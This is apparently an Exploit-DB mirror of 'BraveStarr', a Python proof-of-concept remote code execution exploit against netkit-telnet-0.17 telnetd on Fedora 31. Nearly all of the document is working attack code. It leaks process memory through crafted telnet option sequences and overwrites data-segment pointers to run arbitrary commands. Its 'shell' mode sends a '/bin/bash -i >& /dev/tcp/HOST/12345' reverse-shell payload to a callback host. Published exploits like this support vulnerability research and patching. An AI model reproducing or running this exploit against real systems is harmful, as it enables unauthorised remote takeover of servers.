netkit-telnet-0.17 telnetd (Fedora 31) – ‘BraveStarr’ Remote Code Execution

  • 作者: Immunity
    日期: 2020-03-02
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/48170/
  • #!/usr/bin/env python3
    #
    # BraveStarr
    # ==========
    #
    # Proof of Concept remote exploit against Fedora 31 netkit-telnet-0.17 telnetd.
    #
    # This is for demonstration purposes only.It has by no means been engineered
    # to be reliable: 0xff bytes in addresses and inputs are not handled, and a lot
    # of other constraints are not validated.
    #
    # AppGate (C) 2020 / Ronald Huizer / @ronaldhuizer
    #
    import argparse
    import base64
    import fcntl
    import gzip
    import socket
    import struct
    import sys
    import termios
    import time
    
    class BraveStarr(object):
    SE = 240# 0xf0
    DM = 242# 0xf2
    AO = 245# 0xf5
    SB = 250# 0xfa
    WILL = 251# 0xfb
    WONT = 252# 0xfc
    DO = 253# 0xfd
    IAC= 255# 0xff
    
    TELOPT_STATUS = 5
    TELOPT_TTYPE= 24
    TELOPT_NAWS = 31
    TELOPT_TSPEED = 32
    TELOPT_XDISPLOC = 35
    TELOPT_ENVIRON= 39
    
    TELQUAL_IS= 0
    TELQUAL_SEND= 1
    TELQUAL_INFO= 2
    
    NETIBUF_SIZE= 8192
    NETOBUF_SIZE= 8192
    
    # Data segment offsets of interesting variables relative to `netibuf'.
    netibuf_deltas = {
    'loginprg': -34952,
    'state_rcsid':-34880,
    'subpointer': -34816,
    'ptyslavefd': -34488,
    'environ':-33408,
    'state':-33268,
    'LastArgv': -26816,
    'Argv': -26808,
    'remote_host_name': -26752,
    'pbackp': -9232,
    'nbackp':8192
    }
    
    def __init__(self, host, port=23, timeout=5, callback_host=None):
    self.host= host
    self.port= port
    self.sd= None
    self.timeout = timeout
    
    self.leak_marker = b"MARKER|MARKER"
    self.addresses = {}
    self.values= {}
    
    if callback_host is not None:
    self.chost = bytes(callback_host, 'ascii')
    
    def fatal(self, msg):
    print(msg, file=sys.stderr)
    sys.exit(1)
    
    def connect(self):
    self.sd = socket.create_connection((self.host, self.port))
    
    # Try to ensure the remote side will read a full 8191 bytes for
    # `netobuf_fill' to work properly.
    self.sd.setsockopt(socket.IPPROTO_TCP, socket.TCP_MAXSEG, 8191)
    
    def address_delta(self, name1, name2):
    return self.addresses[name1] - self.addresses[name2]
    
    def address_serialize(self, name):
    return struct.pack("<Q", self.addresses[name])
    
    def ao(self):
    return b"%c%c" % (self.IAC, self.AO)
    
    def do(self, cmd):
    return b"%c%c%c" % (self.IAC, self.DO, cmd)
    
    def sb(self):
    return b"%c%c" % (self.IAC, self.SB)
    
    def se(self):
    return b"%c%c" % (self.IAC, self.SE)
    
    def will(self, cmd):
    return b"%c%c%c" % (self.IAC, self.WILL, cmd)
    
    def wont(self, cmd):
    return b"%c%c%c" % (self.IAC, self.WONT, cmd)
    
    def tx_flush(self):
    while self.tx_len() != 0:
    time.sleep(0.2)
    
    def tx_len(self):
    data = fcntl.ioctl(self.sd, termios.TIOCOUTQ, "")
    return struct.unpack('i', data)[0]
    
    def netobuf_fill(self, delta):
    # This populates the prefix of `netobuf' with IAC WONT SB triplets.
    # This is not relevant now, but during the next time data is sent and
    # `netobuf' will be reprocessed in `netclear' will calls `nextitem'.
    # The `nextitem' function will overindex past `nfrontp' and use these
    # triplets in the processing logic.
    s = self.do(self.SB) * delta
    
    # IAC AO will cause netkit-telnetd to add IAC DM to `netobuf' and set
    # `neturg' to the DM byte in `netobuf'.
    s += self.ao()
    
    # In this request, every byte in `netibuf' will store a byte in
    # `netobuf'.Here we ensure that all `netobuf' space is filled except
    # for the last byte.
    s += self.ao() * (3 - (self.NETOBUF_SIZE - len(s) - 1) % 3)
    
    # We fill `netobuf' with the IAC DO IAC pattern.The last IAC DO IAC
    # triplet will write IAC to the last free byte of `netobuf'.After
    # this `netflush' will be called, and the DO IAC bytes will be written
    # to the beginning of the now empty `netobuf'.
    s += self.do(self.IAC) * ((self.NETOBUF_SIZE - len(s)) // 3)
    
    # Send it out.This should be read in a single read(..., 8191) call on
    # the remote side.We should probably tune the TCP MSS for this.
    self.sd.sendall(s)
    
    # We need to ensure this is written to the remote now.This is a bit
    # of a kludge, as the remote can perfectly well still merge the
    # separate packets into a single read().This is less likely as the
    # time delay increases.To do this properly we'd need to statefully
    # match the responses to what we send.Alack, this is a PoC.
    self.tx_flush()
    
    def reset_and_sync(self):
    # After triggering the bug, we want to ensure that nbackp = nfrontp =
    # netobuf We can do so by getting netflush() called, and an easy way to
    # accomplish this is using the TELOPT_STATUS suboption, which will end
    # with a netflush.
    self.telopt_status()
    
    # We resynchronize on the output we receive by loosely scanning if the
    # TELOPT_STATUS option is there.This is not a reliable way to do
    # things.Alack, this is a PoC.
    s= b""
    status = b"%s%c" % (self.sb(), self.TELOPT_STATUS)
    while status not in s and not s.endswith(self.se()):
    s += self.sd.recv(self.NETOBUF_SIZE)
    
    def telopt_status(self, mode=None):
    if mode is None: mode = self.TELQUAL_SEND
    s = b"%s%c%c%s" % (self.sb(), self.TELOPT_STATUS, mode, self.se())
    self.sd.sendall(self.do(self.TELOPT_STATUS))
    self.sd.sendall(s)
    
    def trigger(self, delta, prefix=b"", suffix=b""):
    assert b"\xff" not in prefix
    assert b"\xff" not in suffix
    
    s = prefix
    
    # Add a literal b"\xff\xf0" to `netibuf'.This will terminate the
    # `nextitem' scanning for IAC SB sequences.
    s += self.se()
    s += self.do(self.IAC) * delta
    
    # IAC AO will force a call to `netclear'.
    s += self.ao()
    s += suffix
    
    self.sd.sendall(s)
    
    def infoleak(self):
    # We use a delta that creates a SB/SE item
    delta = 512
    self.netobuf_fill(delta)
    self.trigger(delta, self.leak_marker)
    
    s = b""
    self.sd.settimeout(self.timeout)
    while self.leak_marker not in s:
    try:
    ret = self.sd.recv(8192)
    except socket.timeout:
    self.fatal('infoleak unsuccessful.')
    
    if ret == b"":
    self.fatal('infoleak unsuccessful.')
    s += ret
    
    return s
    
    def infoleak_analyze(self, s):
    m = s.rindex(self.leak_marker)
    s = s[:m-20]# Cut 20 bytes of padding off too.
    
    # Layout will depend on build.This works on Fedora 31.
    self.values['net'] = struct.unpack("<I", s[-4:])[0]
    self.values['neturg']= struct.unpack("<Q", s[-12:-4])[0]
    self.values['pfrontp'] = struct.unpack("<Q", s[-20:-12])[0]
    self.values['netip'] = struct.unpack("<Q", s[-28:-20])[0]
    
    # Resolve Fedora 31 specific addresses.
    self.addresses['netibuf']= (self.values['netip'] & ~4095) + 0x980
    adjustment = len(max(self.netibuf_deltas, key=len))
    for k, v in self.netibuf_deltas.items():
    self.addresses[k] = self.addresses['netibuf'] + v
    
    def _scratch_build(self, cmd, argv, envp):
    # We use `state_rcsid' as the scratch memory area.As this area is
    # fairly small, the bytes after it on the data segment will likely
    # also be used.Nothing harmful is contained here for a while, so
    # this is okay.
    scratchpad= self.addresses['state_rcsid']
    exec_stub = b"/bin/bash"
    rcsid = b""
    data_offset = (len(argv) + len(envp) + 2) * 8
    
    # First we populate all argv pointers into the scratchpad.
    argv_address = scratchpad
    for arg in argv:
    rcsid += struct.pack("<Q", scratchpad + data_offset)
    data_offset += len(arg) + 1
    rcsid += struct.pack("<Q", 0)
    
    # Next we populate all envp pointers into the scratchpad.
    envp_address = scratchpad + len(rcsid)
    for env in envp:
    rcsid += struct.pack("<Q", scratchpad + data_offset)
    data_offset += len(env) + 1
    rcsid += struct.pack("<Q", 0)
    
    # Now handle the argv strings.
    for arg in argv:
    rcsid += arg + b'\0'
    
    # And the environment strings.
    for env in envp:
    rcsid += env + b'\0'
    
    # Finally the execution stub command is stored here.
    stub_address = scratchpad + len(rcsid)
    rcsid += exec_stub + b"\0"
    
    return (rcsid, argv_address, envp_address, stub_address)
    
    def _fill_area(self, name1, name2, d):
    return b"\0" * (self.address_delta(name1, name2) - d)
    
    def exploit(self, cmd):
    env_user = b"USER=" + cmd
    rcsid, argv, envp, stub = self._scratch_build(cmd, [b"bravestarr"], [env_user])
    
    # The initial exploitation vector: this overwrite the area after
    # `netobuf' with updated pointers values to overwrite `loginprg'
    v= struct.pack("<Q", self.addresses['netibuf'])# netip
    v += struct.pack("<Q", self.addresses['loginprg']) # pfrontp
    v += struct.pack("<Q", 0)# neturg
    v += struct.pack("<I", self.values['net']) # net
    v= v.ljust(48, b'\0')# padding
    
    self.netobuf_fill(len(v))
    self.trigger(len(v), v + struct.pack('<Q', stub), b"A" * 8)
    self.reset_and_sync()
    
    s= b""
    s += self._fill_area('state_rcsid', 'loginprg', 8)
    s += rcsid
    s += self._fill_area('ptyslavefd', 'state_rcsid', len(rcsid))
    s += struct.pack("<I", 5)
    s += self._fill_area('environ', 'ptyslavefd', 4)
    s += struct.pack("<Q", envp)
    s += self._fill_area('LastArgv', 'environ', 8)
    s += struct.pack("<Q", argv) * 2
    s += self._fill_area('remote_host_name', 'LastArgv', 16)
    s += b"-c\0"
    
    self.sd.sendall(s)
    self.tx_flush()
    
    # We need to finish `getterminaltype' in telnetd and ensure `startslave' is
    # called.
    self.sd.sendall(self.wont(self.TELOPT_TTYPE))
    self.sd.sendall(self.wont(self.TELOPT_TSPEED))
    self.sd.sendall(self.wont(self.TELOPT_XDISPLOC))
    self.sd.sendall(self.wont(self.TELOPT_ENVIRON))
    
    banner = """
    H4sICBThWF4CA2JsYQC1W0ly4zAMvPsLuegJ4i5VnjJv0P+vU44TRwTBbsBy5jBVikRiaywE6GX5
    s3+3+38f/9bj41/ePstnLMfz3f3PbP1kqW3xN32xx/kxxe55246Rbum/+dkCcKnx5mPi9BjSfTPJ
    pPwAva8VCmBg3qzQgdYaD0FD/US+J/rvITC+PP+lnkQCQOyoL4oMDhFUpM5F0Fee7UCUHlYEoAf/
    4Puw7t2zasMOcD2BAvFbomqkh3h2rxCvi+Ap5hnG53s8vB1sKj0JCzriRIrQ85jisSw+PY6hyrw8
    SDfC+g3toCYyqKenmA4VBrY4WC681Uif/OtGAnTIxwTBkxD8WEF3nEVfsDCP+5yedwvjzKx71nnt
    0BGJvDlTvnsDNSUOIgv+arD/c0GwkPqKaZIaUVxKDlM+Q8Pmsb8OSsF6FFYM64plS0XZAIYESSJm
    icYGkRMVoC2Mh8T3UOKUriTGUBhg2siCJgyZhZIz9ldqgnE53p6QHwlQhpuoxuiGOK1kup6I9A6Y
    ZlHvsA1iVYWwHSlUiaXQDSbfpOjAwN/MRTamLwLywQSBuEnZIEPMwnU9nAY/FnvSrOtrPolJDjyl
    zRMJNBG75yCeN/x9ViNt5wTBHakABFmkrSukxqL+jFvdI7MTX5l7n0s3UrjeWwp1x4DwOvFOXAuM
    6IyGuG4hqy0ByqDCp6hsIlRQNpcB6qr4ave8C4MFuWDDJijOeCVKsbKxYELrmDgmoUuY/hHh6WCe
    2FdJFUPzrSXgYyxKp2Hyy4yW8gsxgFRGqhr0Nc6A9lzmwIxUeuXLmc8g4SW+Vpq/XCVMocGJHixk
    kbha4l3fRXAcG9WzkS+I7DQDn+XZ8MmEBojsdJC8XaovVH15zkqWJLEYeobZG9sj7nIZgiVEfsB+
    l7Kr7JRlZTtcdUTIyVdMezN5oamjHZPessEpI5yCONsYqJ0lP2hK/csrOJQyi1GRvqPPF1+OqCbB
    /5DL2fKhoUUsGH2kYZRLUGWsS3mSk6nPoDYeNZLhFEpTIiwJDaYaCnGYw3/i5c3Y6obkZx1z1Kim
    3e4Yvc10wyTAPcn63hf1z2c6A63tGJOu2B7sCvbhUWcoQwIp3NLB2/CDdYX1Q8MOOsHQM2HfgIgi
    1H4NP9H086s3hz7AGv362oRkRIONaA3eoW7h0kSzzFSFNkbxBzLS9pro8AMJQambmJQNuyKkDXIu
    cEJOyyapKc8UQOUGMNOEL1U5ApEDqnp4Ly/QkCanBDasIXBl3ZeHRkbDvTEZvbImDCk4Zr2AhXYM
    NNZwZzvj48YgkH5GGVoLmfNGqGIlu2bhxVmNjZ0DRzdfFo+DqyYyma3kfEV6WymzQbbMuJLikOej
    peaYYdpu5l+UGAas3/Npxz97HUaPuLh4KsWHgCivEkn6gbbCE6QY9oIRX5jAZBgUZphTb2O+aDOs
    ddnFkPMp5vRSBfoZC9tJqCnUazDZyQRutd1mmtyJfY/rlM3XldWqezpXdDlnYQcMZ0MqsNwzva96
    e1nJAU/nh4s2qzPByQNHcKaw3dXuqNUx/q7kElF2shosB/Dr1nMNLoNvcpFhVBGvy364elss1JeE
    mQtDebG7+r/tyljmXBlfsh/t+OIgp4ymcFDjUZL1SNCkw5s5hly5MvrRnZo0TF4zmqOeUy4obBX3
    N/i0CGV+0k6SJ2SG+uFHBcPYI66H/bcUt9cdY/KKJmXS1IvBcMTQtLq8cg3sgkLUG+omTBLIRF8i
    k/gVorFb728qz/2e2FyRikg5j93vkct9S8/wo7A/YCVl28Fg+RvO7J1Fw6+73sqJ7Td6L1Oz/vrw
    r/a+S/cfKpbzJTo5AAA=
    """
    
    parser = argparse.ArgumentParser(description="BraveStarr -- Remote Fedora 31 telnetd exploit")
    parser.add_argument('-H', '--hostname', dest='hostname', required=True,
    help='Target IP address or hostname')
    parser.add_argument('-p', '--port', dest='port', type=int, default=23,
    help='port number')
    parser.add_argument('-t', '--timeout', dest='timeout', type=int, default=10,
    help='socket timeout')
    
    method_parser = parser.add_subparsers(dest='method', help='Exploitation method')
    method_parser.required = True
    
    method_infoleak_parser = method_parser.add_parser('leak', help='Leaks memory of the remote process')
    
    method_cmd_parser = method_parser.add_parser('command', help='Executes a blind command on the remote')
    method_cmd_parser.add_argument('command', help='Command to execute')
    
    method_shell_parser = method_parser.add_parser('shell', help='Spawns a shell on the remote and connects back')
    method_shell_parser.add_argument('-c', '--callback', dest='callback', required=True, help='Host to connect back a shell to')
    
    args = parser.parse_args()
    
    for line in gzip.decompress(base64.b64decode(banner)).split(b"\n"):
    sys.stdout.buffer.write(line + b"\n")
    sys.stdout.buffer.flush()
    time.sleep(0.1)
    
    t = BraveStarr(args.hostname, port=args.port, timeout=args.timeout,
     callback_host=getattr(args, 'callback', None))
    
    print(f"\u26e4 Connecting to {args.hostname}:{args.port}")
    t.connect()
    
    # For the `shell' method, we set up a listening socket to receive the callback
    # shell on.
    if args.method == 'shell':
    sd = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sd.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    sd.bind(('0.0.0.0', 12345))
    sd.listen(1)
    
    s = t.infoleak()
    t.infoleak_analyze(s)
    
    print("\n\u26e4 Leaked variables")
    print(f"netip: {t.values['netip']:#016x}")
    print(f"pfrontp: {t.values['pfrontp']:#016x}")
    print(f"neturg : {t.values['neturg']:#016x}")
    print(f"net: {t.values['net']}")
    
    print("\n\u26e4 Resolved addresses")
    adjustment = len(max(t.netibuf_deltas, key=len))
    for k, v in t.netibuf_deltas.items():
    print(f"{k:<{adjustment}}: {t.addresses[k]:#016x}")
    
    if args.method == 'leak':
    sys.exit(0)
    
    t.reset_and_sync()
    
    if args.method == 'shell':
    t.exploit(b"/bin/bash -i >& /dev/tcp/%s/12345 0>&1" % t.chost)
    
    print("\n\u26e4 Waiting for connect back shell")
    if args.method == 'shell':
    import telnetlib
    
    tclient= telnetlib.Telnet()
    tclient.sock = sd.accept()[0]
    tclient.interact()
    sd.close()
    elif args.method == 'command':
    print(f'\n\u26e4 Executing command "{args.command}"')
    t.exploit(bytes(args.command, 'ascii'))